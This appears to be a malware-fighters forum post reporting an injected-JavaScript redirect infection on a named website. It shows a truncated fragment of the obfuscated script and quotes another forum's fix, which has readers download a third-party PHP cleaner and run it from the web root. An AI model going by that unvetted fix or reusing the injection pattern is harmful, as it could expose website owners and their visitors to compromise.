Hi malware fighters,
It was reported top me that htXp://www.niburu.nl has Sign of "JS:Illredir-A [Trj]" been found in it.
Suspicious inline script reported
Script outside of <HTML>...</HTML> block
*
/*GNU GPL*/ try{window.onload = function(){var G85ga3prhrahe = document.createElement('script');G85...
Can someone verify this,
More info on a similar infection:
hxtp://www.vbulletin.com/forum/showthread.php?332174-virus-alert-on-my-forum
There is a new virus attacking websites hosted on linux servers, when you go to an infected website it just displays a white screen, but if you view the source you see something like the above: *
It attacks any webpage that it finds on your server that meet the following criteria:
webpage name - index* / default* or *.js
HERE IS HOW TO FIX IT IN 4 EASY STEPS
1) Download this file: Cure GNU GPL Virus File hxtp://seoforums.org/remove-virus.zip
2) Extract the file contained in it, its called: remove-virus.php
3) Upload that file to the ROOT DIRECTORY of your website
4) Go to: hxtp://YOURWEBSITENAME.COM/remove-virus.php
Thats it, it will take a seconds to a few minutes depending on how large your website is, it scans every file that could be infected, backs it up first, then removes the virus if it finds it.
Once its done its thing, and you are happy that the virus is gone, then you can delete your backups.
polonus